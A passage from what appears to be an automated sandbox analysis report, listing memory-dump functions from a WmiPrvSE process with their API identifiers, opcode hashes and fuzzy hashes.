                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 4D41A033714A8086DB208F26F95D3EE67A0F7A8794F515029EE4D87794EB7DC445C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: ad116fc72a3c7fe84f58facf7c71bff39f0cc1218aea78dd0e90961d0684afb5
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 99116D32209B8082EB608F15F40839EB7E1F798B98F184225EE8C07768DF3DC555CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 13af758e1a50b9c641cc15e308869bca37880d4444e24b2e310ef6c21fd8b65d
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 06118535B01B9482EA148B67A81C2AE63B0FB98FC0F0940289E4D43766DF38C8429300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 7120a257c749987a1a4265124393983a80deee3e1d4210d0586ba47261f1f13f
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 5EE03935B0160486EB148B63E92D3AA36E1FB9DB06F068028890907351DF7E8899C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%